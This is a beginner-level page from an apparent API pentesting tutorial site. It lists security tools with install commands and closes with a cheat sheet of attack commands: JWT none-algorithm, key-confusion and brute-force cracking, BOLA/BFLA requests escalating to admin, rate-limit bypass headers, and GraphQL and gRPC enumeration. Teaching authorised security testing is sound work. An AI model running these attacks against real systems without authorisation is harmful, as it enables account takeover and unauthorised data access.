Tools & Resources
🌱 Beginner

API Pentesting Tools

A curated list of tools specifically designed for API reconnaissance, analysis, and exploitation.

Postman

Client / Testing
Docs

The most popular API client. Essential for manual testing, organizing collections, and automating requests.

Installation

bash 
brew install --cask postman
brew install --cask postman

Burp Suite

Proxy / Scanner
Docs

The industry standard web proxy. Use it to intercept, modify, and scan API traffic.

Installation

bash 
# Download from website
# Download from website

Kiterunner

Reconnaissance
Docs

A high-performance API content discovery tool. Excellent for finding hidden endpoints.

Installation

bash 
brew install kiterunner
brew install kiterunner

Arjun

Reconnaissance
Docs

HTTP parameter discovery suite. Finds hidden query parameters in API endpoints.

Installation

bash 
pip3 install arjun
pip3 install arjun

ffuf

Fuzzing
Docs

Fast web fuzzer written in Go. Great for directory and endpoint discovery.

Installation

bash 
go install github.com/ffuf/ffuf@latest
go install github.com/ffuf/ffuf@latest

jwt_tool

Authentication
Docs

A toolkit for testing, tweaking, and cracking JSON Web Tokens (JWTs).

Installation

bash 
git clone https://github.com/ticarpi/jwt_tool
git clone https://github.com/ticarpi/jwt_tool

SQLMap

Exploitation
Docs

Automatic SQL injection and database takeover tool. Works well on API endpoints.

Installation

bash 
brew install sqlmap
brew install sqlmap

InQL

GraphQL
Docs

A Burp Suite extension for GraphQL security testing. Introspection, scanner, and more.

Installation

bash 
# Install via Burp BApp Store
# Install via Burp BApp Store

grpcurl

gRPC
Docs

Like curl, but for gRPC. Interact with gRPC servers from the command line.

Installation

bash 
brew install grpcurl
brew install grpcurl

Amass

Reconnaissance
Docs

In-depth attack surface mapping and asset discovery.

Installation

bash 
brew install amass
brew install amass

Nuclei

Scanning
Docs

Fast, template-based vulnerability scanner. Has hundreds of API-specific templates for common misconfigurations and CVEs.

Installation

bash 
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

Caido

Proxy / Testing
Docs

Modern web security proxy — a lightweight Burp Suite alternative with a clean UI, built-in replay, and HTTPQL query language.

Installation

bash 
# Download from caido.io
# Download from caido.io

graphql-cop

GraphQL
Docs

Security auditing tool for GraphQL. Checks introspection, batching, field suggestions, persisted queries, and DoS vectors.

Installation

bash 
pip3 install graphql-cop
pip3 install graphql-cop

mitmproxy

Proxy / Scripting
Docs

Interactive TLS-capable intercepting proxy. Scriptable in Python. Excellent for automated API traffic manipulation and gRPC interception.

Installation

bash 
brew install mitmproxy
brew install mitmproxy

HTTPie

Client / Testing
Docs

User-friendly HTTP client for the terminal. Great for quick manual API testing with readable output and session support.

Installation

bash 
brew install httpie
brew install httpie

Schemathesis

Fuzzing / Automation
Docs

Property-based API testing powered by OpenAPI/GraphQL schemas. Automatically generates test cases from your spec and finds edge cases scanners miss.

Installation

bash 
pip3 install schemathesis
pip3 install schemathesis

RESTler

Fuzzing / Automation
Docs

Microsoft's stateful REST API fuzzer. Infers producer-consumer dependencies from Swagger specs and generates intelligent sequences of API calls.

Installation

bash 
dotnet tool install RESTler --global
dotnet tool install RESTler --global

Cherrybomb

Static Analysis
Docs

CLI tool for API security validation — checks OpenAPI specs for OWASP API Top 10 risks, broken auth, excessive data exposure, and missing rate limits.

Installation

bash 
cargo install cherrybomb
cargo install cherrybomb

clairvoyance

GraphQL
Docs

Reconstruct GraphQL schemas when introspection is disabled by exploiting field suggestion error messages.

Installation

bash 
pip3 install clairvoyance
pip3 install clairvoyance

wscat

WebSocket
Docs

WebSocket client for the terminal. Connect, send messages, and test WebSocket APIs from the command line.

Installation

bash 
npm install -g wscat
npm install -g wscat

Reconnaissance

ffuf -u https://target.com/FUZZ -w api-endpoints.txt
kr scan https://target.com -w routes-large.kite
arjun -u https://target.com/api/users -m GET
curl -s https://target.com/swagger.json | jq .

JWT Attacks (jwt_tool)

python3 jwt_tool.py JWT -X a          # none alg
python3 jwt_tool.py JWT -C -d rockyou  # brute
python3 jwt_tool.py JWT -X k -pk pub.pem  # confusion
hashcat -m 16500 jwt.txt rockyou.txt  # hashcat

BOLA / BFLA Testing

# Swap object IDs between two accounts
GET /api/users/VICTIM_ID  (with attacker token)
GET /api/admin/users       (non-admin token)
PUT /api/users/1  -d role=admin
DELETE /api/users/OTHER_ID

Rate Limit Bypass Headers

X-Forwarded-For: 127.0.0.1
X-Real-IP: 10.0.0.1
CF-Connecting-IP: 1.2.3.4
True-Client-IP: 1.2.3.5
X-Originating-IP: 192.168.1.1

GraphQL

graphql-cop -t https://api.target.com/graphql
python3 -m clairvoyance URL -o schema.json
{"query":"{ __schema{types{name}} }"}  # introspect
[{"query":"..."},{"query":"..."}]       # batch

gRPC

grpcurl -plaintext HOST:PORT list
grpcurl -plaintext HOST:PORT describe SVC
grpcurl -plaintext -d '{"id":1}' HOST SVC/Method
grpcui -plaintext HOST:PORT   # web UI
protoc --decode_raw < captured.bin
08. gRPC 10. WebSocket APIs

Related Topics

← Back to API Pentesting

Overview of API security testing

API Reconnaissance

Discovery techniques

GraphQL Testing

GraphQL-specific tools in action

Burp Suite Cheatsheet

Essential proxy tool